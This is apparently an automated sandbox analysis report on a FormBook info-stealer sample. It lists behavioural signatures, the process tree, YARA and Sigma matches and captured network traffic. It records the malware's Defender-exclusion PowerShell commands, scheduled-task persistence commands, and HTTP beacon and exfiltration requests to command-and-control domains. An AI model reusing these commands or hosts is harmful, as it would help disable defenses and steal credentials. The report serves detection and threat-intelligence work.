Edit tour

Windows Analysis Report
FGGx944Qu7.exe

Overview

General Information

Sample name:	FGGx944Qu7.exe renamed because original name is a hash value
Original sample name:	21d18e20b8b0e17e0b554b5940a7aaed.exe
Analysis ID:	1443953
MD5:	21d18e20b8b0e17e0b554b5940a7aaed
SHA1:	bad65794a2bc8c23d373f82e11978f11af1af57d
SHA256:	b600c43e2980691952532a79e7a0aef2351aeef6f740fd2f56647509c93b6da0
Tags:	32exetrojan
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Yara detected AntiVM3

Yara detected FormBook

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

Adds a directory exclusion to Windows Defender

Found direct / indirect Syscall (likely to bypass EDR)

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Adds / modifies Windows certificates

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Stores large binary data to the registry

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

FGGx944Qu7.exe (PID: 7252 cmdline: "C:\Users\user\Desktop\FGGx944Qu7.exe" MD5: 21D18E20B8B0E17E0B554B5940A7AAED)

powershell.exe (PID: 7344 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\FGGx944Qu7.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7400 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7716 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 7424 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TBsjWljiCpR" /XML "C:\Users\user\AppData\Local\Temp\tmp1454.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

FGGx944Qu7.exe (PID: 7604 cmdline: "C:\Users\user\Desktop\FGGx944Qu7.exe" MD5: 21D18E20B8B0E17E0B554B5940A7AAED)

FGGx944Qu7.exe (PID: 7620 cmdline: "C:\Users\user\Desktop\FGGx944Qu7.exe" MD5: 21D18E20B8B0E17E0B554B5940A7AAED)

usFxdnRPYjnb.exe (PID: 4460 cmdline: "C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

SearchProtocolHost.exe (PID: 8040 cmdline: "C:\Windows\SysWOW64\SearchProtocolHost.exe" MD5: 727FE964E574EEAF8917308FFF0880DE)

usFxdnRPYjnb.exe (PID: 2492 cmdline: "C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 7468 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

TBsjWljiCpR.exe (PID: 7680 cmdline: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe MD5: 21D18E20B8B0E17E0B554B5940A7AAED)

schtasks.exe (PID: 7864 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TBsjWljiCpR" /XML "C:\Users\user\AppData\Local\Temp\tmp350B.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

TBsjWljiCpR.exe (PID: 7908 cmdline: "C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe" MD5: 21D18E20B8B0E17E0B554B5940A7AAED)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/ https://asec.ahnlab.com/en/32149/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000010.00000002.2863758312.0000000003070000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000010.00000002.2863758312.0000000003070000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a530:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13b6f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000010.00000002.2861231272.0000000002A20000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000010.00000002.2861231272.0000000002A20000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a530:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13b6f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000008.00000002.1946159228.0000000001510000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.1946159228.0000000001510000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a530:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13b6f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000008.00000002.1945331228.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.1945331228.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2da33:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17072:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000010.00000002.2863668034.0000000003030000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000010.00000002.2863668034.0000000003030000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a530:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13b6f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000D.00000002.2030469230.0000000000417000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x72:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000F.00000002.2863047851.0000000004760000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000F.00000002.2863047851.0000000004760000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x511e5b:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x4fb49a:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000008.00000002.1948193173.0000000003810000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.1948193173.0000000003810000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x511e5b:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x4fb49a:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Process Memory Space: FGGx944Qu7.exe PID: 7252	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: TBsjWljiCpR.exe PID: 7680	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 12 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
8.2.FGGx944Qu7.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
8.2.FGGx944Qu7.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2da33:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17072:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
8.2.FGGx944Qu7.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
8.2.FGGx944Qu7.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2cc33:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x16272:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\FGGx944Qu7.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\FGGx944Qu7.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\FGGx944Qu7.exe", ParentImage: C:\Users\user\Desktop\FGGx944Qu7.exe, ParentProcessId: 7252, ParentProcessName: FGGx944Qu7.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\FGGx944Qu7.exe", ProcessId: 7344, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TBsjWljiCpR" /XML "C:\Users\user\AppData\Local\Temp\tmp350B.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TBsjWljiCpR" /XML "C:\Users\user\AppData\Local\Temp\tmp350B.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe, ParentImage: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe, ParentProcessId: 7680, ParentProcessName: TBsjWljiCpR.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TBsjWljiCpR" /XML "C:\Users\user\AppData\Local\Temp\tmp350B.tmp", ProcessId: 7864, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TBsjWljiCpR" /XML "C:\Users\user\AppData\Local\Temp\tmp1454.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TBsjWljiCpR" /XML "C:\Users\user\AppData\Local\Temp\tmp1454.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\FGGx944Qu7.exe", ParentImage: C:\Users\user\Desktop\FGGx944Qu7.exe, ParentProcessId: 7252, ParentProcessName: FGGx944Qu7.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TBsjWljiCpR" /XML "C:\Users\user\AppData\Local\Temp\tmp1454.tmp", ProcessId: 7424, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\FGGx944Qu7.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\FGGx944Qu7.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\FGGx944Qu7.exe", ParentImage: C:\Users\user\Desktop\FGGx944Qu7.exe, ParentProcessId: 7252, ParentProcessName: FGGx944Qu7.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\FGGx944Qu7.exe", ProcessId: 7344, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TBsjWljiCpR" /XML "C:\Users\user\AppData\Local\Temp\tmp1454.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TBsjWljiCpR" /XML "C:\Users\user\AppData\Local\Temp\tmp1454.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\FGGx944Qu7.exe", ParentImage: C:\Users\user\Desktop\FGGx944Qu7.exe, ParentProcessId: 7252, ParentProcessName: FGGx944Qu7.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TBsjWljiCpR" /XML "C:\Users\user\AppData\Local\Temp\tmp1454.tmp", ProcessId: 7424, ProcessName: schtasks.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: FGGx944Qu7.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://www.drapples.club/q0r6/	Avira URL Cloud: Label: phishing
Source: http://www.drapples.club	Avira URL Cloud: Label: phishing

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe

Avira: detection malicious, Label: HEUR/AGEN.1304432

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	ReversingLabs: Detection: 62%
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Virustotal: Detection: 67%			Perma Link

Multi AV Scanner detection for submitted file

Source: FGGx944Qu7.exe	ReversingLabs: Detection: 62%
Source: FGGx944Qu7.exe	Virustotal: Detection: 67%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 8.2.FGGx944Qu7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.FGGx944Qu7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.2863758312.0000000003070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2861231272.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1946159228.0000000001510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1945331228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2863668034.0000000003030000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2863047851.0000000004760000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1948193173.0000000003810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: FGGx944Qu7.exe

Joe Sandbox ML: detected

Source: FGGx944Qu7.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: FGGx944Qu7.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: usFxdnRPYjnb.exe, 0000000F.00000000.1869462009.0000000000FAE000.00000002.00000001.01000000.0000000A.sdmp, usFxdnRPYjnb.exe, 00000013.00000000.2032183269.0000000000FAE000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: wntdll.pdbUGP source: FGGx944Qu7.exe, 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000010.00000003.1947640704.00000000030E9000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000010.00000002.2864118086.000000000342E000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000010.00000003.1945593903.0000000002F32000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000010.00000002.2864118086.0000000003290000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: FGGx944Qu7.exe, FGGx944Qu7.exe, 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000010.00000003.1947640704.00000000030E9000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000010.00000002.2864118086.000000000342E000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000010.00000003.1945593903.0000000002F32000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000010.00000002.2864118086.0000000003290000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: SearchProtocolHost.pdbUGP source: usFxdnRPYjnb.exe, 0000000F.00000003.1884595652.0000000000C8B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: SearchProtocolHost.pdb source: usFxdnRPYjnb.exe, 0000000F.00000003.1884595652.0000000000C8B000.00000004.00000001.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\FGGx944Qu7.exe

Code function: 4x nop then jmp 0FB01D2Dh

0_2_0FB01F6A

Source: Joe Sandbox View	IP Address: 34.149.87.45 34.149.87.45
Source: Joe Sandbox View	IP Address: 199.59.243.225 199.59.243.225

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /q0r6/?uZgP=5pyvScKx6ZbOO2uX774/2f03V4PpvoLdLg/OCd1FMvXsxJY7YeHi6SxOzHnr25kvmJZHa8XXHydHc3e54xwdxF+eQrhYMnjeuarocBe7v18XiUqzaWXVlPw=&a6m=8Rw4HDhPzbgPS HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.oobzxod2xn.ccConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0

Source: global traffic	DNS traffic detected: DNS query: www.birthingwitht.com
Source: global traffic	DNS traffic detected: DNS query: www.oobzxod2xn.cc
Source: global traffic	DNS traffic detected: DNS query: www.drapples.club

Source: unknown

HTTP traffic detected: POST /q0r6/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflate, brHost: www.drapples.clubOrigin: http://www.drapples.clubReferer: http://www.drapples.club/q0r6/Cache-Control: no-cacheContent-Type: application/x-www-form-urlencodedContent-Length: 201Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0Data Raw: 75 5a 67 50 3d 36 54 37 73 6c 75 67 4c 55 76 59 57 51 53 5a 7a 65 38 54 44 57 75 2f 74 6a 45 67 77 77 4a 67 6d 63 67 50 70 30 4c 47 57 51 37 58 70 48 6e 51 4f 51 6b 50 50 47 37 69 57 30 6c 57 31 6d 4c 2f 41 6a 78 5a 52 4c 4e 57 58 69 6d 68 44 73 45 73 75 39 70 7a 68 42 4a 71 67 48 48 70 55 2b 37 66 71 6d 42 75 44 33 75 4b 68 66 32 32 71 4e 6f 46 62 6a 32 72 39 4d 78 43 68 6e 50 77 57 65 30 47 64 76 37 4f 75 69 65 65 4e 74 43 4c 48 71 59 71 4e 41 70 50 4a 48 2f 77 77 68 4c 45 75 64 4d 76 6b 36 52 30 39 7a 69 4e 55 67 56 4e 69 70 39 65 75 51 48 37 67 6a 44 44 43 6b 50 38 68 2b 2b 38 74 4f 51 3d 3d Data Ascii: uZgP=6T7slugLUvYWQSZze8TDWu/tjEgwwJgmcgPp0LGWQ7XpHnQOQkPPG7iW0lW1mL/AjxZRLNWXimhDsEsu9pzhBJqgHHpU+7fqmBuD3uKhf22qNoFbj2r9MxChnPwWe0Gdv7OuieeNtCLHqYqNApPJH/wwhLEudMvk6R09ziNUgVNip9euQH7gjDDCkP8h++8tOQ==

Source: FGGx944Qu7.exe, TBsjWljiCpR.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: FGGx944Qu7.exe, TBsjWljiCpR.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: FGGx944Qu7.exe, TBsjWljiCpR.exe.0.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: FGGx944Qu7.exe, 00000000.00000002.1688859188.000000000326F000.00000004.00000800.00020000.00000000.sdmp, TBsjWljiCpR.exe, 00000009.00000002.1885020055.0000000003091000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: usFxdnRPYjnb.exe, 00000013.00000002.2865529929.0000000005731000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.drapples.club
Source: usFxdnRPYjnb.exe, 00000013.00000002.2865529929.0000000005731000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.drapples.club/q0r6/
Source: SearchProtocolHost.exe, 00000010.00000003.2412246200.0000000007A18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: SearchProtocolHost.exe, 00000010.00000003.2412246200.0000000007A18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: SearchProtocolHost.exe, 00000010.00000003.2412246200.0000000007A18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: SearchProtocolHost.exe, 00000010.00000003.2412246200.0000000007A18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SearchProtocolHost.exe, 00000010.00000003.2412246200.0000000007A18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: SearchProtocolHost.exe, 00000010.00000003.2412246200.0000000007A18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: SearchProtocolHost.exe, 00000010.00000003.2412246200.0000000007A18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: SearchProtocolHost.exe, 00000010.00000002.2861704958.0000000002CC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: SearchProtocolHost.exe, 00000010.00000003.2407310334.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000010.00000002.2861704958.0000000002CC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: SearchProtocolHost.exe, 00000010.00000003.2407310334.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000010.00000002.2861704958.0000000002CC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: SearchProtocolHost.exe, 00000010.00000003.2407310334.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000010.00000002.2861704958.0000000002CC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
Source: SearchProtocolHost.exe, 00000010.00000003.2407310334.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000010.00000002.2861704958.0000000002CC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: SearchProtocolHost.exe, 00000010.00000003.2407310334.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000010.00000002.2861704958.0000000002CC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: SearchProtocolHost.exe, 00000010.00000003.2407310334.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000010.00000002.2861704958.0000000002CC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
